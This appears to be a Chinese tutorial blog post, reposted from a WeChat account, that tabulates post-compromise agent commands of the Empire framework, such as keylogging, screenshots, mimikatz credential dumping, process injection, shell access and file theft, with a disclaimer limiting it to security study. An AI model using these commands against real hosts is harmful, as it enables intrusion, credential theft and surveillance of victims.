在前面的文章中,我们大致的结束了
emprire
的基础用法和部分命令。本文我们将获得系统回弹后的命令进行介绍。并附上部分命令执行后的效果,方便记忆和学习。
命令
命令 | 说明 | 示例 |
---|---|---|
display | 显示当前连接的属性(设备name ip language )等 |
显示连接设备的 IPdisplay internal_ip |
download | 下载设备文件 | download 文件名 |
help | 显示帮助菜单 | help |
history | 显示历史记录 | history [<number_tasks>] |
info | 显示设备信息 | 直接输入命令 info |
killdate | 设置代理结束时间 | killdate 01/01/2022 |
proxy | 为当前连接设置代理信息 | proxy |
script_command | 导入 PowerShell 脚本。 |
help |
helpscript_import | 将 PowerShell 脚本上传到服务器 | <local_script_location> |
shell | 进入当前设备的 cmd |
也可以在 shell 后面跟相关 cmd 命令 如 shell dir |
sleep | 更新当前代理的延迟和抖动 | sleep |
update_comms | 更新或更换当前的监听 | update_comms xxx |
upload | 上传文件到目标 | upload /root/bj.jpg |
view | 查看上次或前面任务的结果 | view 5 |
vnc | 开启 vnc 服务端 |
vnc |
vnc_client | 连接vnc 用户端 |
vnc_client ip name passwd |
workinghours | 为目标设置工作时间(定时启动 shell) | workinghours 9:00-17:00 |
whoami | 查看当前用户 | whoami |
ps | 显示当前设备的进程 | ps |
sc | 屏幕截图 | sc |
keylog | 键盘记录 | keylog |
sherlock | 运行 powershell/privesc/sherlock | sherlock |
mimikatz | 载入密码破解工具 mimikatz |
mimikatz |
psinject | 进程注入 | psinject 监听模块 进程 id |
spawn | 会话跳转 进程转移 | spawn 监听 name |
部分命令使用演示
whoami
shell
显示当前文件目录信息
shell dir
显示设备信息
info
总结
Empire
是一款功能很强大的工具。如果你熟练 msf 的话,这个上手很简单。很多精彩的玩法,我们会在后面的文章中慢慢更新。敬请期待!
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):empire命令篇(二)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论